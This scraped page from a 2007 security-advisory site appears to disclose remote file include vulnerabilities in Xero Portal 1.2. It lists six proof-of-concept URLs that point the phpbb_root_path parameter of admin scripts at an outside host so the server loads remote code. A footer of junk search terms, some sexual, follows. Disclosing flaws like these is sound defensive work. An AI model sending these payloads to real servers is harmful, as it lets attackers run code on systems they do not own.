about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Digitalxero Xero Portal PHPBB_Root_Path Multiple Remote File Include Vulnerabilities


Title Digitalxero Xero Portal PHPBB_Root_Path Multiple Remote File Include Vulnerabilities
Published 2007-01-25-12:00AM
Updated 2007-01-25-10:29PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  xoron is credited with the discovery of these vulnerabilities.
Vulnerable  digitalxero Xero Portal 1.2
Not Vulnerable  
Code   An attacker can exploit these issues via a web client.

The following proof-of-concept URIs are available.

http://www.example.com/admin/admin_linkdb.php?phpbb_root_path=http://www,example2.com
http://www.example.com/admin/admin_forum_prune.php?phpbb_root_path=http://www,example2.com
http://www.example.com/admin/admin_extensions.php?phpbb_root_path=http://www,example2.com
http://www.example.com/admin/admin_board.php?phpbb_root_path=http://www,example2.com
http://www.example.com/admin/admin_attachments.php?phpbb_root_path=http://www,example2.com
http://www.example.com/admin/admin_users.php?phpbb_root_path=http://www,example2.com
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Mon, 30 Nov 2009 13:02:26 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Sabdrimer+ xxphoto cross Gadis tela freemovies news for c Nude grile burning bo com_jse www.lnwlc. Sabdrimer+ 2.2.13 Searching www.511278 Repair Har Script sou Www.hotest news for c www.010-12 www.worlds VEDOIS SEX Sabdrimer+ Sabdrimer+ Security.d news for C Www.animal irani down www.moneyl www.slin8. news for c sexstory.c bangalore mengyuxing SEXUVIDEO easynews World Www.sony e aimalsex.c www.porntu php-4.4.4 trip.77yoy VEDOIS SEX Video porn sex gerles bqr.ss.la news for c tamilsex.c 3.6.4 PHP4.3.11 www.shunba